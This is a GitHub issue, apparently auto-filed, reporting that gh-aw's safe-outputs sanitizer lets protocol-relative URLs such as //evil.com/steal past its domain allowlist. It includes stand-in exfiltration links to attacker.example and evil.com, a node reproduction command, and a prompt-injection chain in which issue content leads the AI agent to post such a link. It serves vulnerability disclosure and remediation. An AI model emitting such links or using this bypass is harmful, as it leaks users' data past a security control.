-
Notifications
You must be signed in to change notification settings - Fork 318
safe-outputs sanitizer must treat //hostname protocol-relative URLs as blocked domains #23737
Description
Summary
The safe-outputs content sanitizer in sanitize_content_core.cjs (v0.64.4) does not match protocol-relative URLs of the form //hostname/path. Both sanitizeUrlProtocols() (requires explicit protocol:// prefix) and sanitizeUrlDomains() (anchored to https://) miss this form, so //evil.com/steal passes through both filters unmodified. Because GitHub.com is served over HTTPS, a browser resolves //evil.com/steal to (evil.com/redacted) — the same destination that sanitizeUrlDomains()` correctly blocks when the scheme is written explicitly. This contradicts the documented control that safe-outputs restricts AI-generated content to sanitized, allowlisted URLs.
Affected Area
Safe-outputs content sanitization — URL filtering layer (sanitize_content_core.cjs, functions sanitizeUrlProtocols ~line 178 and sanitizeUrlDomains ~line 225).
Reproduction Outline
- Configure a gh-aw workflow with
safe-outputs: create-issue(oradd-comment). - Inject a protocol-relative URL into AI-generated output (e.g., via prompt injection in an issue body):
[click here](//attacker.example/collect?r=secret). - The AI includes this link in its safe-output body.
- Observe that
sanitizeContentCore('[click here](//attacker.example/collect)')returns the input unchanged — the URL is not redacted. - The GitHub API receives and stores the unsanitized link; a viewer clicking it is sent to `(attacker.example/redacted)
Direct verification:
node -e "
process.env.GITHUB_REPOSITORY = 'owner/repo';
const { sanitizeContentCore } = require(process.env.RUNNER_TEMP + '/gh-aw/safeoutputs/sanitize_content_core.cjs');
console.log(sanitizeContentCore('[click](//evil.com/steal)'));
// Expected: [click]((evil.com/redacted))
// Actual: [click](//evil.com/steal) ← not redacted
"Observed Behavior
//evil.com/steal, [Legit link](//evil.com/steal), and  all pass through sanitizeContentCore() unchanged. Explicit `(evil.com/redacted) is correctly redacted.
Expected Behavior
Protocol-relative URLs (//hostname/path) should be treated equivalently to (hostname/redacted) by the domain allowlist check. Disallowed domains should be redacted to (hostname/redacted)` regardless of whether the scheme is explicit or protocol-relative.
Security Relevance
The exploit chain is: cross-prompt injection payload in issue/PR content → AI includes //attacker.example/... in safe-output body → sanitizer passes it unchanged → GitHub posts the link → maintainer clicks or image auto-loads in their browser, resolving to the attacker's HTTPS server. For image embeds (), GitHub's camo proxy still reveals to the attacker that the image was requested. This fully bypasses the URL domain allowlist, which is a documented and load-bearing security control.
Suggested fix: Extend sanitizeUrlProtocols to also match //hostname[/path] patterns and apply the same domain allowlist check, or normalize protocol-relative URLs to https:// before the existing sanitizeUrlDomains check. Add a regression test asserting //evil.com/path is treated equivalently to `(evil.com/redacted)
gh-aw version: v0.65.0 (finding reported against v0.64.4)
Original finding: https://github.com/githubnext/gh-aw-security/issues/1646
Generated by File Issue · ◷